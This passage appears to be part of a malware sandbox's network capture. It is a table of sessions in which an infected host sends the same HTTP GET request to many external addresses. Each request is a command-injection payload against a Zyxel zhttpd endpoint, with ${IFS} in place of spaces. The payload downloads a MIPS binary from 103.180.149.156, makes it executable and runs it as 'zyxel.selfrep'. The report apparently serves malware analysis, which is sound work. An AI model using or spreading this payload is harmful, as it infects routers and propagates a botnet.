                                            Feb 2, 2024 06:21:26.913656950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8073192.168.2.1540456155.89.173.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913691998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8074192.168.2.155348234.203.108.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913716078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8075192.168.2.1550178201.182.48.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913753986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8076192.168.2.1552830195.110.189.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913785934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8077192.168.2.1541776123.103.167.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913831949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8078192.168.2.155071654.179.141.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913867950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8079192.168.2.155436089.152.219.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913917065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8080192.168.2.153454879.132.71.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913949966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8081192.168.2.1548952163.66.188.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913964033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8082192.168.2.1551932146.124.164.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914005041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8083192.168.2.1544812179.39.70.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914025068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8084192.168.2.1559396110.45.8.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914053917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8085192.168.2.1540920126.7.154.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914103985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8086192.168.2.15460725.190.78.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914124012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8087192.168.2.1555964152.173.137.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914170027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8088192.168.2.1543510212.39.158.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914227962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8089192.168.2.1554164105.157.107.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914262056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8090192.168.2.1546142133.100.58.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914305925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8091192.168.2.15495962.85.8.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914336920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8092192.168.2.1557084176.103.229.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914378881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8093192.168.2.1540260182.149.150.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914416075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8094192.168.2.1551152134.39.228.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914427996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8095192.168.2.1550154111.52.232.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914498091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8096192.168.2.154165082.155.170.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914524078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8097192.168.2.1556080204.180.7.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914582014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8098192.168.2.154436664.103.231.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914623976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8099192.168.2.154731648.250.125.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914665937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8100192.168.2.1536496192.210.23.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914701939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8101192.168.2.1544038198.166.164.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914747000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8102192.168.2.1539964113.242.38.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914797068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8103192.168.2.155508691.158.143.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914843082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8104192.168.2.154983250.229.118.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914863110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8105192.168.2.1560182109.84.16.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914900064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8106192.168.2.1545576181.77.252.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914940119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8107192.168.2.155584675.115.70.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.914994955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8108192.168.2.153610652.204.213.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915035009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8109192.168.2.1558640167.253.123.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915071011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8110192.168.2.1547274176.65.39.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915133953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8111192.168.2.155477236.254.81.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915133953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8112192.168.2.1549024124.232.123.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915186882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8113192.168.2.1540902220.178.253.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915235043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8114192.168.2.1558564118.207.233.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915278912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8115192.168.2.154548683.164.195.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915311098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8116192.168.2.153705691.16.170.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915364027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8117192.168.2.1545858123.168.225.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915412903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8118192.168.2.154044020.160.143.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915540934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8119192.168.2.155895687.96.235.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915570021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8120192.168.2.1554216179.227.217.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915626049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8121192.168.2.1536766222.117.97.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915666103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8122192.168.2.153672088.55.222.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915690899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8123192.168.2.153848472.163.10.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915735960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8124192.168.2.1534146181.70.77.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915770054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8125192.168.2.1533898112.23.65.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915816069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8126192.168.2.154319081.224.187.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915819883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8127192.168.2.154925676.45.252.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915889025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8128192.168.2.1551768157.196.202.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915918112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8129192.168.2.1535990201.240.103.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915934086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8130192.168.2.154817464.182.87.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.915990114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8131192.168.2.1537834155.1.143.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916038990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8132192.168.2.1536772138.77.231.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916085005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8133192.168.2.1546668174.206.132.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916122913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8134192.168.2.1545542196.166.200.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916162968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8135192.168.2.1535634161.228.254.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.916203022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8136192.168.2.154608089.62.112.65443
                                            TimestampBytes transferredDirectionData
